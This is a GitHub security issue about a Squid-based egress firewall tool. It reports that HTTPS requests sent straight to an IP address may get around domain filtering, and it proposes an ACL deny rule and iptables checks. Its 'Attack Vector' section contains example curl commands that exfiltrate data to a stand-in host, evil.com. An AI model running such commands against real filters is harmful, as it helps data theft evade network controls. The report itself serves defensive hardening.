[Security] Direct IP + TLS connections may bypass domain filtering

[Mossaka]

Priority

P1 - High

Summary

When a client connects directly to an IP address using HTTPS (without a domain name), Squid cannot extract SNI information. This may allow bypassing domain-based filtering.

Current Behavior

Normal HTTPS request:

CONNECT github.com:443 HTTP/1.1
→ Squid extracts "github.com" from CONNECT request
→ Domain ACL check performed

Direct IP HTTPS request:

CONNECT 140.82.114.4:443 HTTP/1.1
→ Squid sees only IP address
→ No domain to match against ACL

Attack Vector

# Attacker knows the IP of evil.com
EVIL_IP=$(dig +short evil.com)

# Direct IP connection - no domain in request
curl --resolve evil.com:443:$EVIL_IP https://evil.com/exfiltrate
# Or even simpler:
curl -k https://$EVIL_IP/exfiltrate

Current Mitigation

Host-level iptables has a default deny rule that should block traffic to unknown IPs:

• Only traffic to Squid (172.30.0.10) and DNS servers is allowed
• All other outbound traffic is blocked

Verification Needed

Test whether direct IP connections are blocked:

sudo awf --allow-domains example.com -- /bin/bash -c '
  echo "--- Test 1: Via domain name ---"
  curl -s -o /dev/null -w "%{http_code}\n" https://example.com
  
  echo "--- Test 2: Via direct IP ---"
  curl -s -o /dev/null -w "%{http_code}\n" --max-time 5 https://93.184.216.34 2>&1 || echo "Failed/Blocked"
  
  echo "--- Test 3: Check Squid log ---"
  sleep 2
  cat /tmp/awf-*/squid-logs/access.log | tail -5
'

Expected Behavior

Direct IP connections should be blocked by:

1. Squid ACL: Explicit deny for non-domain CONNECT requests
2. Host iptables: Default deny for non-whitelisted destinations

Proposed Fix

Option A: Explicit Squid ACL for IP-based CONNECT

Add to src/squid-config.ts:

# Deny CONNECT to IP addresses (no domain)
acl ip_connect dstdom_regex ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$
http_access deny ip_connect

Option B: Verify host iptables blocks this

Ensure default deny rule catches this case:

# In src/host-iptables.ts
# Verify: -A FW_WRAPPER -j DROP (default deny)

Files to Modify

• src/squid-config.ts - Add IP CONNECT deny rule
• src/squid-config.test.ts - Test IP CONNECT is denied
• Verification script for testing

Testing

• Direct IP HTTPS is blocked
• Domain-based HTTPS still works
• Squid logs show IP CONNECT attempts as denied
• Host iptables provides backup blocking

[github-actions]

🍪 Issue Monster has assigned this to Copilot!

I've identified this issue as a good candidate for automated resolution and assigned it to the Copilot agent.

The Copilot agent will analyze the issue and create a pull request with the fix.

Om nom nom! 🍪

AI generated by Issue Monster